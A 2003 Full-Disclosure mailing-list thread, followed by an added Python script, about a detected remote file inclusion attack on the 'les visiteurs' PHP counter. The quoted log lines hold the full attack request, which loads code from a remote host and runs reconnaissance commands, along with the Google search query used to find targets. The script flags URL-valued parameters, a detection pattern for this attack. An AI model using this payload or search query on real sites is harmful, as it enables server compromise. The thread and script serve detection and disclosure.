I was curious about how they found my site stats (they were in a not-standard-directory...)
looks like they googled their way in :)

[EMAIL PROTECTED] evert]# zcat /var/log/httpd/access_log.1.gz | grep 200.138.213.246
200.138.213.246 - - [29/Nov/2003:20:53:13 +0100] "GET /counter/?view=year&ypd=1 HTTP/1.1" 200 14565 "http://www.google.com.br/search?num=100&hl=pt-BR&ie=UTF-8&oe=UTF-8&q=allinurl%3A+%3Fview%3Dyear+ypd%3D1&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
200.138.213.246 - - [29/Nov/2003:20:53:14 +0100] "GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls HTTP/1.1" 401 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
[EMAIL PROTECTED] evert]#

kind regards,
Evert

> Hi Daniel,
> They are kiddies... :(
> I was looking at the files and there are only high-risk-rated exploits
> downloaded from packet storm, ptrace, etc.
> And they are running remote php shells in their server.... xD
>
> See you in the IRC tonight?
>
> Best regards,
> -------------------------------
> 0x00->Lorenzo Hernandez Garcia-Hierro
> 0x01->\x74\x72\x75\x6c\x75\x78
> 0x02->The truth is out there,
> 0x03-> outside your mind .
> __________________________________
> PGP: Keyfingerprint
> 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
> ID: 0x91805F5B
> **********************************
> \x6e\x73\x72\x67
> \x73\x65\x63\x75\x72\x69\x74\x79
> \x72\x65\x73\x65\x61\x72\x63\x68
> http://www.nsrg-security.com
> ______________________
> ----- Original Message -----
> From: "Dan" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Monday, December 01, 2003 6:02 PM
> Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
>
> > This is the same set of files that I noticed last week (xfteam.net), it seems
> > they closed their domain down? (I cannot find it)
> > Does anyone know if these ppl are a real sec organisation? or just some
> > kiddies?
> >
> > Cheers,
> > Daniel.
> >
> > "Evert Daman" <[EMAIL PROTECTED]> wrote:
> > >
> > > last night snort detected this request:
> > >
> > > GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
> > >
> > > because I patched 'les visiteurs' as described by 'matthieu peschaud'
> > > on bugtraq on the 26 of October nothing happened, but it looks like someone
> > > is trying to exploit this bug.
> > > just want to mention it to this wonderful list :)
> > >
> > > kind regards,
> > > Evert
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
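
The log check done by hand above (grep one client, read the referer, spot the URL-valued include parameter) can be automated. The following is an added example, not part of the original thread: it scans Apache combined-format lines, flags any query parameter whose value is a remote URL, and attaches the search terms from that client's earlier referer. The sample lines, addresses and host names are constructed, and treating any referer with a q= parameter as a search result page is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself a URL is the remote-include indicator.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def search_terms(referer):
    """Decoded q= value of a referer, or None (assumption: q= means a search page)."""
    return dict(parse_qsl(urlsplit(referer).query)).get("q")

def find_remote_includes(lines):
    """Return one finding per URL-valued query parameter, with per-client context."""
    findings, searches = [], {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        terms = search_terms(m["referer"])
        if terms:
            searches[m["ip"]] = terms  # remember how this client found the site
        query = m["target"].partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "ip": m["ip"], "time": m["time"], "param": name,
                    "remote": value, "status": int(m["status"]),
                    "served": m["status"].startswith("2"),  # 2xx: script ran
                    "found_via": searches.get(m["ip"]),
                })
    return findings

# Constructed sample lines modelled on the entries quoted in the thread.
SAMPLE = [
    '203.0.113.7 - - [29/Nov/2003:20:53:13 +0100] "GET /counter/?view=year&ypd=1 HTTP/1.1" 200 14565 '
    '"http://www.google.example/search?q=allinurl%3A+%3Fview%3Dyear+ypd%3D1" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Nov/2003:20:53:14 +0100] "GET /counter/include/new-visitor.inc.php'
    '?lvc_include_dir=http://remote.example/x.gif?&cmd=id HTTP/1.1" 401 409 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [29/Nov/2003:21:00:00 +0100] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE):
        print(f)
```

A finding with "served" set to True deserves the closest look, since the 401 in the thread's log is what shows the request never reached the include script.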
